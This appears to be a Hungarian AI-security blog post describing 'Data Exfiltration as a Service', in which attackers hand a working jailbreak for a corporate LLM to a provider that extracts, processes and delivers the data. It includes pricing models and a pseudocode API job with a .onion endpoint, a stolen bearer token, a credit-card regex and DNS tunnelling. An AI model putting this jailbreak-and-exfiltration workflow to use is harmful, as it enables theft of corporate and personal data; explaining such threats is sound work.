31.4.5. Adatszivárogtató szolgáltatások

2025.10.06.
AI Biztonság Blog

Tegyük fel, hogy találtál egy zseniális, többlépcsős jailbreak technikát, ami egy nagyvállalati, belső használatú LLM-ből képes kiszedni a betanításához használt adatbázis-dumpokat. A promptod működik, a modell ontja magából a strukturált adatokat. A probléma? A kimenet darabokban érkezik, a cég hálózati védelme folyamatosan bontja a kapcsolatot, és neked nincs sem időd, sem infrastruktúrád arra, hogy egy több terabájtos adatszivárogtatást menedzselj anélkül, hogy lebuknál. Itt lép a képbe egy speciális, professzionalizálódott réteg a földalatti gazdaságban.

Kapcsolati űrlap

AI Biztonság kérdésed van? Itt elérsz minket:

Ez nem más, mint az Adatszivárogtatás mint Szolgáltatás (Data Exfiltration as a Service – DExaaS). Ez a modell a klasszikus kiberbűnözői „as-a-Service” sémát ülteti át az MI-alapú támadások világába. Ahelyett, hogy te magad végeznéd el a „piszkos munkát”, vagyis a nagy mennyiségű adat tényleges kinyerését, egy erre specializálódott szolgáltatóra bízod azt.

A szolgáltatás anatómiája

A DExaaS szolgáltatók leveszik a terhet a támadó válláról azzal, hogy a teljes adatkivezetési folyamatot automatizálják és menedzselik. A munkamegosztás általában a következőképpen néz ki:

  1. A kliens (a támadó): Biztosítja a működő jailbreak promptot vagy a kihasználható sebezhetőséget, valamint a célpontot. Ő a „kulcs” birtokosa.
  2. A DExaaS platform: A szolgáltató biztosítja a robusztus, elosztott infrastruktúrát. Ez magában foglalja a proxy szerverek hálózatát, a botneteket, a session menedzsmentet, az adatok automatikus gyűjtését, tömörítését, titkosítását és tárolását.
  3. Az adatfeldolgozás: A szolgáltató a nyers, gyakran töredezett adatfolyamot megtisztítja, strukturálja, és a kliens számára használható formátumba konvertálja.
  4. Az átadás: A kinyert és feldolgozott adatokat egy biztonságos csatornán (pl. titkosított konténer, privát dark web tárhely) keresztül átadják a kliensnek.

Ez a modell lehetővé teszi a szereplők specializálódását: a jailbreak-kutatók a sebezhetőségek felderítésére koncentrálhatnak, míg az operátorok az infrastruktúra üzemeltetésére és a lebukás elkerülésére.

Működési folyamat és infrastruktúra

A DExaaS platformok lényege a skálázhatóság és a rejtőzködés. Ahelyett, hogy egyetlen IP címről próbálnák meg a teljes adatbázist letölteni, egy kifinomult rendszert használnak.

Támadó DExaaS Platform Célpont LLM Adatgyűjtő Szerver 1. Jailbreak & Cél 2. Támadás proxykon át 3. Adatszivárgás 4. Feldolgozott adat
A DExaaS szolgáltatás tipikus adatfolyama.

Monetizációs modellek

A DExaaS szolgáltatók többféle üzleti modellben is működhetnek, attól függően, hogy milyen típusú adatokat céloznak és milyen klienskörrel rendelkeznek:

  • Gigabájtonkénti fizetés (Pay-per-GB): A legegyszerűbb modell. A kliens a kinyert adatok mennyisége után fizet. Ez általában alacsonyabb értékű, de nagy volumenű adatok esetén gyakori.
  • Sikerdíj (Revenue Share / Success Fee): Magasabb értékű adatok (pl. személyes adatok, pénzügyi információk, üzleti titkok) esetén a szolgáltató részesedést kér az adatok eladásából származó profitból. Ez akár 30-50% is lehet.
  • Előfizetéses modell: Ritkább, de létező modell, ahol a támadó egy havi díjért cserébe egy bizonyos sávszélességet vagy lekérdezési limitet kap a DExaaS infrastruktúráján. Ezt jellemzően profi, folyamatosan működő csoportok veszik igénybe.

Egy API hívás anatómiája

A kifinomultabb szolgáltatások API-n keresztül is elérhetők, ami lehetővé teszi a támadások automatizálását. Egy ilyen (pszeudokód) kérés így nézhet ki:


# Pszeudokód egy DExaaS API híváshoz
DEXAAS_API_ENDPOINT = "https://dexaas-provider.onion/api/v2/jobs"

job_payload = {
 "api_key": "YOUR_SECRET_API_KEY",
 "target": {
 "type": "llm_endpoint",
 "url": "https://internal-corp-gpt.example.com/chat",
 "auth_token": "bearer_token_stolen_from_employee"
 },
 "exfiltration_params": {
 "jailbreak_prompt": "BASE64_ENCODED_PROMPT_HERE",
 "data_pattern": "regex_for_credit_card_numbers",
 "max_data_gb": 500,
 "exfil_method": "dns_tunneling_low_bw"
 },
 "delivery": {
 "method": "encrypted_s3_bucket",
 "bucket_id": "client-dropzone-7712"
 }
}

response = send_request(DEXAAS_API_ENDPOINT, job_payload)
print(f"Job indítva, ID: {response['job_id']}")
 

Ez a példa jól mutatja a modell lényegét: a támadó megadja a kulcsot (jailbreak prompt), a zárat (célpont), és megmondja, mit keres (adatminta), a többit pedig a szolgáltatás elvégzi.

Kulcsgondolat: Az adatszivárogtató szolgáltatások megjelenése az MI-alapú támadások iparosodásának és professzionalizálódásának egyértelmű jele. A támadási lánc elemei szétválnak, lehetővé téve a szereplők specializálódását, ami növeli a teljes ökoszisztéma hatékonyságát és veszélyességét.